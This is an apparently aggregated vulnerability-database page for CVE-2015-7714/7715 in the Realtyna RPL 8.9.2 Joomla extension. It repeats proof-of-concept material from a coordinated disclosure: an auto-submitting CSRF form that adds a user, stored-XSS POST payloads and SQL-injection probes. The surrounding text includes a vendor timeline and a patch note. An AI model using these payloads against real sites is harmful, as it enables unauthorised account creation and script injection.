Realtyna RPL 8.9.2 CSRF / Cross Site Scripting

2015-10-23T00:00:00

Description

{"id": "PACKETSTORM:134067", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Realtyna RPL 8.9.2 CSRF / Cross Site Scripting", "description": "", "published": "2015-10-23T00:00:00", "modified": "2015-10-23T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/134067/Realtyna-RPL-8.9.2-CSRF-Cross-Site-Scripting.html", "reporter": "zeroscience.mk", "references": [], "cvelist": ["CVE-2015-7715"], "lastseen": "2016-12-05T22:16:05", "viewCount": 12, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7715"]}, {"type": "exploitdb", "idList": ["EDB-ID:38528"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2D6B93425DAE9993F1A3957160BA5F04"]}, {"type": "zdt", "idList": ["1337DAY-ID-24460"]}, {"type": "zeroscience", "idList": ["ZSL-2015-5271", "ZSL-2015-5272"]}]}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:38528"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2D6B93425DAE9993F1A3957160BA5F04"]}, {"type": "zdt", "idList": ["1337DAY-ID-24460"]}]}, "exploitation": null, "vulnersScore": 0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/134067/ZSL-2015-5271.txt", "sourceData": "`Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities \n \n \nVendor: Realtyna LLC \nProduct web page: https://www.realtyna.com \nAffected version: 8.9.2 \n \nSummary: Realtyna CRM (Client Relationship Management) Add-on \nfor RPL is a Real Estate CRM specially designed and developed \nbased on business process and models required by Real Estate \nAgents/Brokers. Realtyna CRM intends to increase the Conversion \nRatio of the website Visitors to Leads and then Leads to Clients. \n \n \nDesc: The application allows users to perform certain actions \nvia HTTP requests without performing any validity checks to \nverify the requests. This can be exploited to perform certain \nactions with administrative privileges if a logged-in user visits \na malicious web site. Multiple cross-site scripting vulnerabilities \nwere also discovered. The issue is triggered when input passed \nvia the multiple parameters is not properly sanitized before \nbeing returned to the user. This can be exploited to execute \narbitrary HTML and script code in a user's browser session in \ncontext of an affected site. \n \nTested on: Apache \nPHP/5.4.38 \nMySQL/5.5.42-cll \n \nVulnerability discovered by Bikramaditya 'PhoenixX' Guha \n \n \nAdvisory ID: ZSL-2015-5271 \nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php \nVendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog \nCVE ID: CVE-2015-7715 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715 \n \n \n05.10.2015 \n \n-- \n \n \n1. CSRF: \n \n<html lang=\"en\"> \n<head> \n<title>CSRF POC</title> \n</head> \n<body> \n<form action=\"http://localhost/administrator/index.php\" id=\"formid\" method=\"post\"> \n<input type=\"hidden\" name=\"option\" value=\"com_rpl\" /> \n<input type=\"hidden\" name=\"view\" value=\"addon_membership_members\" /> \n<input type=\"hidden\" name=\"format\" value=\"ajax\" /> \n<input type=\"hidden\" name=\"function\" value=\"add_user\" /> \n<input type=\"hidden\" name=\"id\" value=\"85\" /> \n</form> \n<script> \ndocument.getElementById('formid').submit(); \n</script> \n</body> \n</html> \n \n \n2. Cross Site Scripting (Stored): \n \nhttp://localhost/administrator/index.php \nPOST parameters: new_location_en_gb, new_location_fr_fr \n \nPayloads: \n \noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&new_location_fr_fr=&level=1&parent=&function=add_location \noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=&new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&level=1&parent=&function=add_location \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659994789, "score": 1659995475}, "_internal": {"score_hash": "4f7576b0b644bf4247da6f8e4d0d4558"}}

{"exploitpack": [{"lastseen": "2020-04-01T19:04:23", "description": "\nJoomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting Cross-Site Request Forgery", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-10-23T00:00:00", "title": "Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting Cross-Site Request Forgery", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7715"], "modified": "2015-10-23T00:00:00", "id": "EXPLOITPACK:2D6B93425DAE9993F1A3957160BA5F04", "href": "", "sourceData": "Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities\n\n\nVendor: Realtyna LLC\nProduct web page: https://www.realtyna.com\nAffected version: 8.9.2\n\nSummary: Realtyna CRM (Client Relationship Management) Add-on\nfor RPL is a Real Estate CRM specially designed and developed\nbased on business process and models required by Real Estate\nAgents/Brokers. Realtyna CRM intends to increase the Conversion\nRatio of the website Visitors to Leads and then Leads to Clients.\n\n\nDesc: The application allows users to perform certain actions\nvia HTTP requests without performing any validity checks to\nverify the requests. This can be exploited to perform certain\nactions with administrative privileges if a logged-in user visits\na malicious web site. Multiple cross-site scripting vulnerabilities\nwere also discovered. The issue is triggered when input passed\nvia the multiple parameters is not properly sanitized before\nbeing returned to the user. This can be exploited to execute\narbitrary HTML and script code in a user's browser session in\ncontext of an affected site.\n\nTested on: Apache\n PHP/5.4.38\n\t\t MySQL/5.5.42-cll\n\nVulnerability discovered by Bikramaditya 'PhoenixX' Guha\n\n\nAdvisory ID: ZSL-2015-5271\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php\nVendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog\nCVE ID: CVE-2015-7715\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715\n\n\n05.10.2015\n\n--\n\n\n1. CSRF:\n\n<html lang=\"en\">\n<head>\n<title>CSRF POC</title>\n</head>\n<body>\n<form action=\"http://localhost/administrator/index.php\" id=\"formid\" method=\"post\">\n<input type=\"hidden\" name=\"option\" value=\"com_rpl\" />\n<input type=\"hidden\" name=\"view\" value=\"addon_membership_members\" />\n<input type=\"hidden\" name=\"format\" value=\"ajax\" />\n<input type=\"hidden\" name=\"function\" value=\"add_user\" />\n<input type=\"hidden\" name=\"id\" value=\"85\" />\n</form>\n<script>\ndocument.getElementById('formid').submit();\n</script>\n</body>\n</html>\n\n\n2. Cross Site Scripting (Stored):\n\nhttp://localhost/administrator/index.php\nPOST parameters: new_location_en_gb, new_location_fr_fr\n\nPayloads:\n\noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&new_location_fr_fr=&level=1&parent=&function=add_location\noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=&new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&level=1&parent=&function=add_location", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-03-14T02:40:45", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2015-10-23T00:00:00", "type": "zdt", "title": "Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-7715"], "modified": "2015-10-23T00:00:00", "id": "1337DAY-ID-24460", "href": "https://0day.today/exploit/description/24460", "sourceData": "Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities\r\n \r\n \r\nVendor: Realtyna LLC\r\nProduct web page: https://www.realtyna.com\r\nAffected version: 8.9.2\r\n \r\nSummary: Realtyna CRM (Client Relationship Management) Add-on\r\nfor RPL is a Real Estate CRM specially designed and developed\r\nbased on business process and models required by Real Estate\r\nAgents/Brokers. Realtyna CRM intends to increase the Conversion\r\nRatio of the website Visitors to Leads and then Leads to Clients.\r\n \r\n \r\nDesc: The application allows users to perform certain actions\r\nvia HTTP requests without performing any validity checks to\r\nverify the requests. This can be exploited to perform certain\r\nactions with administrative privileges if a logged-in user visits\r\na malicious web site. Multiple cross-site scripting vulnerabilities\r\nwere also discovered. The issue is triggered when input passed\r\nvia the multiple parameters is not properly sanitized before\r\nbeing returned to the user. This can be exploited to execute\r\narbitrary HTML and script code in a user's browser session in\r\ncontext of an affected site.\r\n \r\nTested on: Apache\r\n PHP/5.4.38\r\n MySQL/5.5.42-cll\r\n \r\nVulnerability discovered by Bikramaditya 'PhoenixX' Guha\r\n \r\n \r\nAdvisory ID: ZSL-2015-5271\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php\r\nVendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog\r\nCVE ID: CVE-2015-7715\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715\r\n \r\n \r\n05.10.2015\r\n \r\n--\r\n \r\n \r\n1. CSRF:\r\n \r\n<html lang=\"en\">\r\n<head>\r\n<title>CSRF POC</title>\r\n</head>\r\n<body>\r\n<form action=\"http://localhost/administrator/index.php\" id=\"formid\" method=\"post\">\r\n<input type=\"hidden\" name=\"option\" value=\"com_rpl\" />\r\n<input type=\"hidden\" name=\"view\" value=\"addon_membership_members\" />\r\n<input type=\"hidden\" name=\"format\" value=\"ajax\" />\r\n<input type=\"hidden\" name=\"function\" value=\"add_user\" />\r\n<input type=\"hidden\" name=\"id\" value=\"85\" />\r\n</form>\r\n<script>\r\ndocument.getElementById('formid').submit();\r\n</script>\r\n</body>\r\n</html>\r\n \r\n \r\n2. Cross Site Scripting (Stored):\r\n \r\nhttp://localhost/administrator/index.php\r\nPOST parameters: new_location_en_gb, new_location_fr_fr\r\n \r\nPayloads:\r\n \r\noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&new_location_fr_fr=&level=1&parent=&function=add_location\r\noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=&new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&level=1&parent=&function=add_location\n\n# 0day.today [2018-03-14] #", "sourceHref": "https://0day.today/exploit/24460", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2022-03-23T13:57:59", "description": "Cross-site request forgery (CSRF) vulnerability in the Realtyna RPL (com_rpl) component before 8.9.5 for Joomla! allows remote attackers to hijack the authentication of administrators for requests that add a user via an add_user action to administrator/index.php.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-18T18:29:00", "type": "cve", "title": "CVE-2015-7715", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7715"], "modified": "2020-07-30T16:14:00", "cpe": [], "id": "CVE-2015-7715", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7715", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "zeroscience": [{"lastseen": "2021-12-15T06:43:27", "description": "Title: Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities \nAdvisory ID: [ZSL-2015-5271](<ZSL-2015-5271.php>) \nType: Local/Remote \nImpact: Cross-Site Scripting \nRisk: (3/5) \nRelease Date: 22.10.2015 \n\n\n##### Summary\n\nRealtyna CRM (Client Relationship Management) Add-on for RPL is a Real Estate CRM specially designed and developed based on business process and models required by Real Estate Agents/Brokers. Realtyna CRM intends to increase the Conversion Ratio of the website Visitors to Leads and then Leads to Clients. \n\n##### Description\n\nThe application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via the multiple parameters is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. \n\n##### Vendor\n\nRealtyna LLC - <https://www.realtyna.com>\n\n##### Affected Version\n\n8.9.2 \n\n##### Tested On\n\nApache \nPHP/5.4.38 \n\n##### Vendor Status\n\n[05.10.2015] Vulnerability discovered. \n[06.10.2015] CVE-2015-7714 and CVE-2015-7715 assigned. \n[07.10.2015] Contact with the vendor. \n[07.10.2015] Vendor responded asking for details. \n[07.10.2015] Advisory and details sent to the vendor. \n[08.10.2015] Vendor confirms the vulnerability scheduling patch release date. \n[21.10.2015] Vendor releases version 8.9.5 to address these issues. \n[22.10.2015] Coordinated public security advisory released. \n\n##### PoC\n\n[realtyna_xsscsrf.txt](<../../codes/realtyna_xsscsrf.txt>)\n\n##### Credits\n\nVulnerability discovered by Bikramaditya Guha - <[bik@zeroscience.mk](<mailto:bik@zeroscience.mk>)> \nHigh five to lqwrm and crash! \n\n##### References\n\n[1] <http://rpl.realtyna.com/Change-Logs/RPL7-Changelog> \n[2] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715> \n[3] <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7715> \n[4] <https://cxsecurity.com/issue/WLB-2015100148> \n[5] <https://www.exploit-db.com/exploits/38528/> \n[6] <https://packetstormsecurity.com/files/134067>\n\n##### Changelog\n\n[22.10.2015] - Initial release \n[24.10.2015] - Added reference [4], [5] and [6] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-10-22T00:00:00", "type": "zeroscience", "title": "Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7714", "CVE-2015-7715"], "modified": "2015-10-22T00:00:00", "id": "ZSL-2015-5271", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php", "sourceData": "<html><body><p>Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities\r\n\r\n\r\nVendor: Realtyna LLC\r\nProduct web page: https://www.realtyna.com\r\nAffected version: 8.9.2\r\n\r\nSummary: Realtyna CRM (Client Relationship Management) Add-on\r\nfor RPL is a Real Estate CRM specially designed and developed\r\nbased on business process and models required by Real Estate\r\nAgents/Brokers. Realtyna CRM intends to increase the Conversion\r\nRatio of the website Visitors to Leads and then Leads to Clients.\r\n\r\n\r\nDesc: The application allows users to perform certain actions\r\nvia HTTP requests without performing any validity checks to\r\nverify the requests. This can be exploited to perform certain\r\nactions with administrative privileges if a logged-in user visits\r\na malicious web site. Multiple cross-site scripting vulnerabilities\r\nwere also discovered. The issue is triggered when input passed\r\nvia the multiple parameters is not properly sanitized before\r\nbeing returned to the user. This can be exploited to execute\r\narbitrary HTML and script code in a user's browser session in\r\ncontext of an affected site.\r\n\r\nTested on: Apache\r\n PHP/5.4.38\r\n\r\n\r\nVulnerability discovered by Bikramaditya 'PhoenixX' Guha\r\n\r\n\r\nAdvisory ID: ZSL-2015-5271\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php\r\nVendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog\r\nCVE ID: CVE-2015-7715\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715\r\n\r\n\r\n05.10.2015\r\n\r\n--\r\n\r\n\r\n1. CSRF:\r\n\r\n\r\n</p>\n<title>CSRF POC</title>\n<form action=\"http://localhost/administrator/index.php\" id=\"formid\" method=\"post\">\n<input name=\"option\" type=\"hidden\" value=\"com_rpl\"/>\n<input name=\"view\" type=\"hidden\" value=\"addon_membership_members\"/>\n<input name=\"format\" type=\"hidden\" value=\"ajax\"/>\n<input name=\"function\" type=\"hidden\" value=\"add_user\"/>\n<input name=\"id\" type=\"hidden\" value=\"85\"/>\n</form>\n<script>\r\ndocument.getElementById('formid').submit();\r\n</script>\r\n\r\n\r\n\r\n\r\n2. Cross Site Scripting (Stored):\r\n\r\nhttp://localhost/administrator/index.php\r\nPOST parameters: new_location_en_gb, new_location_fr_fr\r\n\r\nPayloads:\r\n\r\noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&new_location_fr_fr=&level=1&parent=&function=add_location\r\noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=&new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&level=1&parent=&function=add_location\r\n</body></html>", "sourceHref": "http://zeroscience.mk/codes/realtyna_xsscsrf.txt", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-15T06:43:18", "description": "Title: Realtyna RPL 8.9.2 Joomla Extension Multiple SQL Injection Vulnerabilities \nAdvisory ID: [ZSL-2015-5272](<ZSL-2015-5272.php>) \nType: Local/Remote \nImpact: Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data \nRisk: (4/5) \nRelease Date: 22.10.2015 \n\n\n##### Summary\n\nRealtyna CRM (Client Relationship Management) Add-on for RPL is a Real Estate CRM specially designed and developed based on business process and models required by Real Estate Agents/Brokers. Realtyna CRM intends to increase the Conversion Ratio of the website Visitors to Leads and then Leads to Clients. \n\n##### Description\n\nRealtyna RPL suffers from multiple SQL Injection vulnerabilities. Input passed via multiple POST parameters is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n\n##### Vendor\n\nRealtyna LLC - <https://www.realtyna.com>\n\n##### Affected Version\n\n8.9.2 \n\n##### Tested On\n\nApache \nPHP/5.4.38 \n\n##### Vendor Status\n\n[05.10.2015] Vulnerability discovered. \n[06.10.2015] CVE-2015-7714 and CVE-2015-7715 assigned. \n[07.10.2015] Contact with the vendor. \n[07.10.2015] Vendor responded asking for details. \n[07.10.2015] Advisory and details sent to the vendor. \n[08.10.2015] Vendor confirms the vulnerability scheduling patch release date. \n[21.10.2015] Vendor releases version 8.9.5 to address these issues. \n[22.10.2015] Coordinated public security advisory released. \n\n##### PoC\n\n[realtyna_sqli.txt](<../../codes/realtyna_sqli.txt>)\n\n##### Credits\n\nVulnerability discovered by Bikramaditya Guha - <[bik@zeroscience.mk](<mailto:bik@zeroscience.mk>)> \nHigh five to lqwrm and crash! \n\n##### References\n\n[1] <http://rpl.realtyna.com/Change-Logs/RPL7-Changelog> \n[2] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7714> \n[3] <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7714> \n[4] <https://cxsecurity.com/issue/WLB-2015100147> \n[5] <https://www.exploit-db.com/exploits/38527/> \n[6] <https://packetstormsecurity.com/files/134066> \n[7] <https://exchange.xforce.ibmcloud.com/vulnerabilities/107582>\n\n##### Changelog\n\n[22.10.2015] - Initial release \n[24.10.2015] - Added reference [4], [5] and [6] \n[31.10.2015] - Added reference [7] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-10-22T00:00:00", "type": "zeroscience", "title": "Realtyna RPL 8.9.2 Joomla Extension Multiple SQL Injection Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7714", "CVE-2015-7715"], "modified": "2015-10-22T00:00:00", "id": "ZSL-2015-5272", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2015-5272.php", "sourceData": "<html><body><p>\ufeff\r\nRealtyna RPL 8.9.2 Joomla Extension Multiple SQL Injection Vulnerabilities\r\n\r\n\r\nVendor: Realtyna LLC\r\nProduct web page: https://www.realtyna.com\r\nAffected version: 8.9.2\r\n\r\nSummary: Realtyna CRM (Client Relationship Management) Add-on\r\nfor RPL is a Real Estate CRM specially designed and developed\r\nbased on business process and models required by Real Estate\r\nAgents/Brokers. Realtyna CRM intends to increase the Conversion\r\nRatio of the website Visitors to Leads and then Leads to Clients.\r\n\r\n\r\nDesc: Realtyna RPL suffers from multiple SQL Injection vulnerabilities.\r\nInput passed via multiple POST parameters is not properly sanitised\r\nbefore being returned to the user or used in SQL queries. This can\r\nbe exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nTested on: Apache\r\n PHP/5.4.38\r\n\r\n\r\nVulnerability discovered by Bikramaditya 'PhoenixX' Guha\r\n\r\n\r\nAdvisory ID: ZSL-2015-5272\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5272.php\r\nVendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog\r\nCVE ID: CVE-2015-7714\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7714\r\n\r\n\r\n05.10.2015\r\n\r\n--\r\n\r\n\r\nhttp://localhost/administrator/index.php\r\nPOST parameters: id, copy_field, pshow, css, tip, cat_id, text_search, plisting, pwizard\r\n\r\nPayloads:\r\n\r\n- option=com_rpl&view=addon_membership_members&format=edit&id=84'\r\n- option=com_rpl&view=property_structure&format=ajax&function=new_field&id=3004'&type=text\r\n- option=com_rpl&view=rpl_multilingual&format=ajax&function=data_copy&copy_field=308'&copy_from=&copy_to=en_gb&copy_method=1\r\n- option=com_rpl&view=property_structure&format=ajax&function=update_field&id=3002&options=0&css=&tip=&style=&name=&cat_id=1&text_search=0&plisting=0&pshow=1'&pwizard=1&mode=add\r\n</p></body></html>", "sourceHref": "http://zeroscience.mk/codes/realtyna_sqli.txt", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}

Realtyna RPL 8.9.2 CSRF / Cross Site Scripting

Description

Related